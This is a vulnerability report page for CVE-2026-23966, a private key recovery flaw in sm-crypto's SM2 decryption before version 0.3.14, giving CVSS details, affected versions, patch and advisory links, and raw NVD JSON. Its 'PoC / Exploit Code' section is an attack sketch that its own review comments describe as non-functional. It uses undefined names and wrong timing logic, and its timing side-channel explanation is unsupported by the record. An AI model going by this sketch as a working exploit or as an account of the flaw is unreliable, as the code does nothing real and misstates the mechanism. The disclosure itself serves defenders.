Security Vulnerability Report
CVE-2026-23966 CVSS 9.1 CRITICAL

CVE-2026-23966

Published: 2026-01-22 03:15:47
Last Modified: 2026-02-25 15:30:41

Description

sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A private key recovery vulnerability exists in the SM2 decryption logic of sm-crypto prior to version 0.3.14. By interacting with the SM2 decryption interface multiple times, an attacker can fully recover the private key within approximately several hundred interactions. Version 0.3.14 patches the issue.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:juneandgreen:sm-crypto:*:*:*:*:*:*:*:* - VULNERABLE
sm-crypto < 0.3.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-23966 PoC - SM2 Private Key Recovery
// This PoC demonstrates the vulnerability in sm-crypto < 0.3.14
// Note: This is for educational and testing purposes only
//
// NOTE(review): as written this snippet is a non-functional sketch, not a
// working reproduction. It references `privateKey` and `analyzeBit`, and
// neither is declared anywhere in it, so (unless globals of those names
// exist) every loop iteration below throws a ReferenceError that is caught
// and recorded as 'failed', and analyzeTimingLeak() throws on its first
// call. Do not treat it as evidence for or against exploitability; the
// vendor advisory and patch commit listed in the record below are the
// authority. The only remediation is to upgrade sm-crypto to 0.3.14 or
// later; the NVD record classifies the weakness as CWE-345.
const smCrypto = require('sm-crypto');

/**
 * Calls sm2.decrypt() 500 times and records success/failure per iteration,
 * then hands the collected records to analyzeTimingLeak().
 *
 * @param {string} publicKey - unused inside the function body.
 * @param {string} ciphertext - passed unchanged to every decrypt() call.
 * @returns {Promise<string>} whatever analyzeTimingLeak() returns.
 */
async function exploitSM2Decryption(publicKey, ciphertext) {
  const attempts = [];
  // Attack: Repeatedly call SM2 decryption with crafted ciphertext
  // The vulnerability allows private key recovery after ~hundreds of calls
  // NOTE(review): the ciphertext is never modified between iterations, so
  // nothing here is "crafted"; each call receives the same input.
  for (let i = 0; i < 500; i++) {
    try {
      // Each decryption attempt leaks information about the private key
      // through timing or error patterns
      // `privateKey` is not declared in this snippet; `decrypted` is never read.
      const decrypted = smCrypto.sm2.decrypt(
        ciphertext,
        privateKey,
        1 // mode 1 for decryption
      );
      // Collect timing information (side-channel)
      // NOTE(review): process.hrtime() with no argument returns the current
      // high-resolution clock value, not an elapsed duration, and it is
      // sampled only after decrypt() returns, so it does not measure the call.
      const timing = process.hrtime();
      attempts.push({ iteration: i, timing: timing, result: 'success' });
    } catch (error) {
      // Only the message is kept; the error type is not inspected.
      attempts.push({ iteration: i, error: error.message, result: 'failed' });
    }
  }
  // Analyze collected data to recover private key
  // The fixed version 0.3.14 prevents this information leakage
  return analyzeTimingLeak(attempts);
}

/**
 * Builds a 256-entry array from analyzeBit() and hex-encodes it.
 *
 * NOTE(review): `analyzeBit` is not defined in this snippet, so this
 * function throws a ReferenceError on its first iteration. Even if it were
 * defined, Buffer.from() of a 256-element array produces a 256-byte buffer
 * (one byte per entry), i.e. 512 hex characters, not a 32-byte SM2 key.
 *
 * @param {Array<object>} attempts - records collected by exploitSM2Decryption().
 * @returns {string} hex encoding of the collected entries.
 */
function analyzeTimingLeak(attempts) {
  // Statistical analysis to recover private key bits
  // This simplified version shows the attack concept
  const keyBits = [];
  for (let i = 0; i < 256; i++) {
    // Analyze timing patterns for each bit position
    const bit = analyzeBit(attempts, i);
    keyBits.push(bit);
  }
  return Buffer.from(keyBits).toString('hex');
}

// Usage example
// NOTE(review): the key pair is generated locally and its private key is
// never passed to exploitSM2Decryption(), so this example has no oracle to
// query. The promise has no .catch(); since the async function rejects (see
// analyzeTimingLeak), running this yields an unhandled rejection.
const keypair = smCrypto.sm2.generateKeyPair();
const message = 'Sensitive data';
const ciphertext = smCrypto.sm2.encrypt(message, keypair.publicKey);
exploitSM2Decryption(keypair.publicKey, ciphertext).then(recoveredKey => {
  console.log('Private key recovered:', recoveredKey);
});

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23966", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.007", "lastModified": "2026-02-25T15:30:40.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A private key recovery vulnerability exists in the SM2 decryption logic of sm-crypto prior to version 0.3.14. By interacting with the SM2 decryption interface multiple times, an attacker can fully recover the private key within approximately several hundred interactions. Version 0.3.14 patches the issue."}, {"lang": "es", "value": "sm-crypto proporciona implementaciones de JavaScript de los algoritmos criptográficos chinos SM2, SM3 y SM4. Existe una vulnerabilidad de recuperación de clave privada en la lógica de descifrado SM2 de sm-crypto anterior a la versión 0.3.14. Al interactuar con la interfaz de descifrado SM2 varias veces, un atacante puede recuperar completamente la clave privada en aproximadamente varios cientos de interacciones. 
La versión 0.3.14 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juneandgreen:sm-crypto:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.3.14", "matchCriteriaId": "902F9DFD-B5BC-4BF4-9AF2-CB42F616B3D4"}]}]}], "references": [{"url": "https://github.com/JuneAndGreen/sm-crypto/commit/b1c824e58fdf1eaa73692c124a095819a8c45707", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-pgx9-497m-6c4v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}